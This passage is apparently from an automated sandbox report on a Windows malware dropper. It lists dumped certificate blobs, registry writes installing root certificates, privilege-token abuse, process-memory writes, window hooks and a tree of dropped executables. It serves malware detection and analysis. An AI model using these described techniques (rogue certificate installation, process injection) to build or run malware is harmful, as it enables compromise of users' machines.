6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 108 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 130 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 137 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 138 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 243 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 247 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 106 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exejfiag3g_gg.exeWerFault.exeFile.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeMaskVPNUpdate.exeSetup.tmpEsplorarne.exe.comEsplorarne.exe.comxtect12.exepid process 4608 WerFault.exe 4608 WerFault.exe 3736 WerFault.exe 3736 WerFault.exe 3660 WerFault.exe 3660 WerFault.exe 3764 jfiag3g_gg.exe 3764 jfiag3g_gg.exe 3548 WerFault.exe 3548 WerFault.exe 4464 File.exe 4464 File.exe 4464 File.exe 4464 File.exe 4464 File.exe 4464 File.exe 4464 File.exe 4464 File.exe 4464 File.exe 4464 File.exe 668 WerFault.exe 668 WerFault.exe 3832 WerFault.exe 3832 WerFault.exe 4164 WerFault.exe 4164 WerFault.exe 2184 WerFault.exe 2184 WerFault.exe 2796 WerFault.exe 2796 WerFault.exe 4824 WerFault.exe 4824 WerFault.exe 3532 WerFault.exe 3532 WerFault.exe 1684 MaskVPNUpdate.exe 1684 MaskVPNUpdate.exe 5508 Setup.tmp 5508 Setup.tmp 1004 Esplorarne.exe.com 1004 Esplorarne.exe.com 3424 Esplorarne.exe.com 3424 Esplorarne.exe.com 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe 1432 xtect12.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
6798012.exe4116312.exepid process 5000 6798012.exe 1996 4116312.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Install.exeWerFault.exeKRSetp.exemd9_1sjm.exe2u55W290oBvJVcrb8gcaR3aD.exefy9NfATq_QWOepz6ymSl2HMo.exesvchost.exeEsplorarne.exe.com6609898.exeEsplorarne.exe.comtjy1GrraGlAjKtsTJ6fwTeqw.exedcN39oeQcO1TI8LbRct_X8zm.exeaskinstall53.exedescription pid process Token: SeCreateTokenPrivilege 744 Install.exe Token: SeAssignPrimaryTokenPrivilege 744 Install.exe Token: SeLockMemoryPrivilege 744 Install.exe Token: SeIncreaseQuotaPrivilege 744 Install.exe Token: SeMachineAccountPrivilege 744 Install.exe Token: SeTcbPrivilege 744 Install.exe Token: SeSecurityPrivilege 744 Install.exe Token: SeTakeOwnershipPrivilege 744 Install.exe Token: SeLoadDriverPrivilege 744 Install.exe Token: SeSystemProfilePrivilege 744 Install.exe Token: SeSystemtimePrivilege 744 Install.exe Token: SeProfSingleProcessPrivilege 744 Install.exe Token: SeIncBasePriorityPrivilege 744 Install.exe Token: SeCreatePagefilePrivilege 744 Install.exe Token: SeCreatePermanentPrivilege 744 Install.exe Token: SeBackupPrivilege 744 Install.exe Token: SeRestorePrivilege 744 Install.exe Token: SeShutdownPrivilege 744 Install.exe Token: SeDebugPrivilege 744 Install.exe Token: SeAuditPrivilege 744 Install.exe Token: SeSystemEnvironmentPrivilege 744 Install.exe Token: SeChangeNotifyPrivilege 744 Install.exe Token: SeRemoteShutdownPrivilege 744 Install.exe Token: SeUndockPrivilege 744 Install.exe Token: SeSyncAgentPrivilege 744 Install.exe Token: SeEnableDelegationPrivilege 744 Install.exe Token: SeManageVolumePrivilege 744 Install.exe Token: SeImpersonatePrivilege 744 Install.exe Token: SeCreateGlobalPrivilege 744 Install.exe Token: 31 744 Install.exe Token: 32 744 Install.exe Token: 33 744 Install.exe Token: 34 744 Install.exe Token: 35 744 Install.exe Token: SeRestorePrivilege 4608 WerFault.exe Token: SeBackupPrivilege 4608 WerFault.exe Token: SeBackupPrivilege 4608 WerFault.exe Token: SeDebugPrivilege 3900 KRSetp.exe Token: SeManageVolumePrivilege 3124 md9_1sjm.exe Token: SeManageVolumePrivilege 3124 md9_1sjm.exe Token: SeManageVolumePrivilege 3124 md9_1sjm.exe Token: SeManageVolumePrivilege 3124 md9_1sjm.exe Token: SeManageVolumePrivilege 3124 md9_1sjm.exe Token: SeDebugPrivilege 2988 2u55W290oBvJVcrb8gcaR3aD.exe Token: SeDebugPrivilege 1252 fy9NfATq_QWOepz6ymSl2HMo.exe Token: SeDebugPrivilege 3068 svchost.exe Token: SeDebugPrivilege 3424 Esplorarne.exe.com Token: SeDebugPrivilege 3712 6609898.exe Token: SeDebugPrivilege 1004 Esplorarne.exe.com Token: SeDebugPrivilege 5116 tjy1GrraGlAjKtsTJ6fwTeqw.exe Token: SeDebugPrivilege 4308 dcN39oeQcO1TI8LbRct_X8zm.exe Token: SeCreateTokenPrivilege 2384 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 2384 askinstall53.exe Token: SeLockMemoryPrivilege 2384 askinstall53.exe Token: SeIncreaseQuotaPrivilege 2384 askinstall53.exe Token: SeMachineAccountPrivilege 2384 askinstall53.exe Token: SeTcbPrivilege 2384 askinstall53.exe Token: SeSecurityPrivilege 2384 askinstall53.exe Token: SeTakeOwnershipPrivilege 2384 askinstall53.exe Token: SeLoadDriverPrivilege 2384 askinstall53.exe Token: SeSystemProfilePrivilege 2384 askinstall53.exe Token: SeSystemtimePrivilege 2384 askinstall53.exe Token: SeProfSingleProcessPrivilege 2384 askinstall53.exe Token: SeIncBasePriorityPrivilege 2384 askinstall53.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
jamesold.exeYqIXiCL33maLAy2OB92ojfwd.tmpCleaner Installation.exeInlog.tmpConhost.exeVPN.tmpSetup.exet32Ur7ILpInlYyJRLs12SnLx.tmpSetup.tmpSetup.tmppid process 1268 jamesold.exe 1268 jamesold.exe 1268 jamesold.exe 1268 jamesold.exe 1268 jamesold.exe 1268 jamesold.exe 1268 jamesold.exe 2792 YqIXiCL33maLAy2OB92ojfwd.tmp 2508 Cleaner Installation.exe 1244 Inlog.tmp 2332 Conhost.exe 2840 VPN.tmp 132 Setup.exe 6892 t32Ur7ILpInlYyJRLs12SnLx.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 5508 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp 4276 Setup.tmp -
Suspicious use of SendNotifyMessage 13 IoCs
Processes:
jamesold.exeEsplorarne.exe.comEsplorarne.exe.compid process 1268 jamesold.exe 1268 jamesold.exe 1268 jamesold.exe 1268 jamesold.exe 1268 jamesold.exe 1268 jamesold.exe 1268 jamesold.exe 6988 Esplorarne.exe.com 6988 Esplorarne.exe.com 6988 Esplorarne.exe.com 6664 Esplorarne.exe.com 6664 Esplorarne.exe.com 6664 Esplorarne.exe.com -
Suspicious use of SetWindowsHookEx 56 IoCs
Processes:
File.exegq7BdFzcCpgT9R8qUlDBiVoJ.exeAE4Cr0V8AbXUi2Vh3WIgJzcr.exeTNGkwm8vY3ofA8gUTLfxgcxK.exeY7aLf8zJ97XcPikNEtC8S9tn.exe2D6KXJ4Sih2rnKqehqnnaTsh.exeZH_D8d_woMBuwaliVLK7dXsO.exeHigBkRPx0qyWn99cHptOkbti.exeYqIXiCL33maLAy2OB92ojfwd.execustomer3.exeYqIXiCL33maLAy2OB92ojfwd.tmpn5iK85pyxBdO3WOr6bRNQ6xx.exemsedge.exe8473479.exen5iK85pyxBdO3WOr6bRNQ6xx.exe11111.exeLGCH2-401_2021-08-18_14-40.exeInlog.exeWEATHER Manager.exeInlog.tmpEsplorarne.exe.comVPN.exeConhost.exeVPN.tmpaskinstall53.exeMediaBurner2.exeMediaBurner2.tmp11111.exeMaskVPNUpdate.exe11111.exextect12.exezhaoy-game.exeSetup.exezhaoy-game.exebEQOSwZfLy35v67HMStZes1l.exeWerFault.exePSFJVLwun3TcfKuUSaxkpg3c.exemsedge.exemsedge.exeasMNUD7Whzsx89sAGP_aLokg.exet32Ur7ILpInlYyJRLs12SnLx.exeWchvfjN_dzKFtUxFm7qRXxfF.exepCuweAs8rFE1CgxW49f5aXKk.exet32Ur7ILpInlYyJRLs12SnLx.tmpSetup.exetmp9432_tmp.exeSetup.tmpSetup.exeSetup.tmppCuweAs8rFE1CgxW49f5aXKk.exeSetup.exesvchost.exesvrwebui.exevdi_compiler.exeEsplorarne.exe.comEsplorarne.exe.compid process 4464 File.exe 3904 gq7BdFzcCpgT9R8qUlDBiVoJ.exe 5080 AE4Cr0V8AbXUi2Vh3WIgJzcr.exe 4612 TNGkwm8vY3ofA8gUTLfxgcxK.exe 1480 Y7aLf8zJ97XcPikNEtC8S9tn.exe 3712 2D6KXJ4Sih2rnKqehqnnaTsh.exe 3896 ZH_D8d_woMBuwaliVLK7dXsO.exe 3636 HigBkRPx0qyWn99cHptOkbti.exe 3176 YqIXiCL33maLAy2OB92ojfwd.exe 4200 customer3.exe 2792 YqIXiCL33maLAy2OB92ojfwd.tmp 2712 n5iK85pyxBdO3WOr6bRNQ6xx.exe 3428 msedge.exe 804 8473479.exe 4844 n5iK85pyxBdO3WOr6bRNQ6xx.exe 1396 11111.exe 1524 LGCH2-401_2021-08-18_14-40.exe 2144 Inlog.exe 1264 WEATHER Manager.exe 1244 Inlog.tmp 860 Esplorarne.exe.com 2380 VPN.exe 2332 Conhost.exe 2840 VPN.tmp 2384 askinstall53.exe 3948 MediaBurner2.exe 5388 MediaBurner2.tmp 5468 11111.exe 1684 MaskVPNUpdate.exe 4228 11111.exe 1432 xtect12.exe 5356 zhaoy-game.exe 132 Setup.exe 2828 zhaoy-game.exe 6248 bEQOSwZfLy35v67HMStZes1l.exe 6264 WerFault.exe 6384 PSFJVLwun3TcfKuUSaxkpg3c.exe 6392 msedge.exe 6236 msedge.exe 6492 asMNUD7Whzsx89sAGP_aLokg.exe 6416 t32Ur7ILpInlYyJRLs12SnLx.exe 4640 WchvfjN_dzKFtUxFm7qRXxfF.exe 4572 pCuweAs8rFE1CgxW49f5aXKk.exe 6892 t32Ur7ILpInlYyJRLs12SnLx.tmp 7020 Setup.exe 736 tmp9432_tmp.exe 4276 Setup.tmp 584 Setup.exe 5508 Setup.tmp 1544 pCuweAs8rFE1CgxW49f5aXKk.exe 4112 Setup.exe 4020 svchost.exe 5276 svrwebui.exe 5132 vdi_compiler.exe 6988 Esplorarne.exe.com 6664 Esplorarne.exe.com -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
C0672CA6E505B76756AC421EF9D33409.bin.exeWerFault.exeWerFault.exeFolder.exeFiles.exerUNdlL32.eXeWerFault.exeWerFault.exeFile.exedescription pid process target process PID 3832 wrote to memory of 3900 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe KRSetp.exe PID 3832 wrote to memory of 3900 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe KRSetp.exe PID 3832 wrote to memory of 3528 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Folder.exe PID 3832 wrote to memory of 3528 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Folder.exe PID 3832 wrote to memory of 3528 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Folder.exe PID 3832 wrote to memory of 3792 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Info.exe PID 3832 wrote to memory of 3792 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Info.exe PID 3832 wrote to memory of 3792 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Info.exe PID 3832 wrote to memory of 4464 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe File.exe PID 3832 wrote to memory of 4464 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe File.exe PID 3832 wrote to memory of 4464 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe File.exe PID 3832 wrote to memory of 860 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe pub2.exe PID 3832 wrote to memory of 860 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe pub2.exe PID 3832 wrote to memory of 860 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe pub2.exe PID 3832 wrote to memory of 744 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Install.exe PID 3832 wrote to memory of 744 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Install.exe PID 3832 wrote to memory of 744 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Install.exe PID 3832 wrote to memory of 1268 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe jamesold.exe PID 3832 wrote to memory of 1268 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe jamesold.exe PID 3832 wrote to memory of 1268 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe jamesold.exe PID 3832 wrote to memory of 3124 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe md9_1sjm.exe PID 3832 wrote to memory of 3124 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe md9_1sjm.exe PID 3832 wrote to memory of 3124 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe md9_1sjm.exe PID 3832 wrote to memory of 1888 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Files.exe PID 3832 wrote to memory of 1888 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Files.exe PID 3832 wrote to memory of 1888 3832 C0672CA6E505B76756AC421EF9D33409.bin.exe Files.exe PID 2108 wrote to memory of 860 2108 WerFault.exe pub2.exe PID 2108 wrote to memory of 860 2108 WerFault.exe pub2.exe PID 4620 wrote to memory of 3792 4620 WerFault.exe Info.exe PID 4620 wrote to memory of 3792 4620 WerFault.exe Info.exe PID 3528 wrote to memory of 3480 3528 Folder.exe Folder.exe PID 3528 wrote to memory of 3480 3528 Folder.exe Folder.exe PID 3528 wrote to memory of 3480 3528 Folder.exe Folder.exe PID 1888 wrote to memory of 1672 1888 Files.exe jfiag3g_gg.exe PID 1888 wrote to memory of 1672 1888 Files.exe jfiag3g_gg.exe PID 1888 wrote to memory of 1672 1888 Files.exe jfiag3g_gg.exe PID 3788 wrote to memory of 2288 3788 rUNdlL32.eXe rundll32.exe PID 3788 wrote to memory of 2288 3788 rUNdlL32.eXe rundll32.exe PID 3788 wrote to memory of 2288 3788 rUNdlL32.eXe rundll32.exe PID 4592 wrote to memory of 2288 4592 WerFault.exe rundll32.exe PID 4592 wrote to memory of 2288 4592 WerFault.exe rundll32.exe PID 1888 wrote to memory of 3764 1888 Files.exe jfiag3g_gg.exe PID 1888 wrote to memory of 3764 1888 Files.exe jfiag3g_gg.exe PID 1888 wrote to memory of 3764 1888 Files.exe jfiag3g_gg.exe PID 4628 wrote to memory of 744 4628 WerFault.exe Install.exe PID 4628 wrote to memory of 744 4628 WerFault.exe Install.exe PID 4464 wrote to memory of 3904 4464 File.exe gq7BdFzcCpgT9R8qUlDBiVoJ.exe PID 4464 wrote to memory of 3904 4464 File.exe gq7BdFzcCpgT9R8qUlDBiVoJ.exe PID 4464 wrote to memory of 3904 4464 File.exe gq7BdFzcCpgT9R8qUlDBiVoJ.exe PID 4464 wrote to memory of 5080 4464 File.exe AE4Cr0V8AbXUi2Vh3WIgJzcr.exe PID 4464 wrote to memory of 5080 4464 File.exe AE4Cr0V8AbXUi2Vh3WIgJzcr.exe PID 4464 wrote to memory of 5080 4464 File.exe AE4Cr0V8AbXUi2Vh3WIgJzcr.exe PID 4464 wrote to memory of 4612 4464 File.exe TNGkwm8vY3ofA8gUTLfxgcxK.exe PID 4464 wrote to memory of 4612 4464 File.exe TNGkwm8vY3ofA8gUTLfxgcxK.exe PID 4464 wrote to memory of 4612 4464 File.exe TNGkwm8vY3ofA8gUTLfxgcxK.exe PID 4464 wrote to memory of 1252 4464 File.exe fy9NfATq_QWOepz6ymSl2HMo.exe PID 4464 wrote to memory of 1252 4464 File.exe fy9NfATq_QWOepz6ymSl2HMo.exe PID 4464 wrote to memory of 1252 4464 File.exe fy9NfATq_QWOepz6ymSl2HMo.exe PID 4464 wrote to memory of 5116 4464 File.exe tjy1GrraGlAjKtsTJ6fwTeqw.exe PID 4464 wrote to memory of 5116 4464 File.exe tjy1GrraGlAjKtsTJ6fwTeqw.exe PID 4464 wrote to memory of 5116 4464 File.exe tjy1GrraGlAjKtsTJ6fwTeqw.exe PID 4464 wrote to memory of 1856 4464 File.exe KlF1TC_kNM1irfli5mSNl_JB.exe PID 4464 wrote to memory of 1856 4464 File.exe KlF1TC_kNM1irfli5mSNl_JB.exe PID 4464 wrote to memory of 1856 4464 File.exe KlF1TC_kNM1irfli5mSNl_JB.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\C0672CA6E505B76756AC421EF9D33409.bin.exe"C:\Users\Admin\AppData\Local\Temp\C0672CA6E505B76756AC421EF9D33409.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3792 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\fy9NfATq_QWOepz6ymSl2HMo.exe"C:\Users\Admin\Documents\fy9NfATq_QWOepz6ymSl2HMo.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\AE4Cr0V8AbXUi2Vh3WIgJzcr.exe"C:\Users\Admin\Documents\AE4Cr0V8AbXUi2Vh3WIgJzcr.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 2804⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\TNGkwm8vY3ofA8gUTLfxgcxK.exe"C:\Users\Admin\Documents\TNGkwm8vY3ofA8gUTLfxgcxK.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
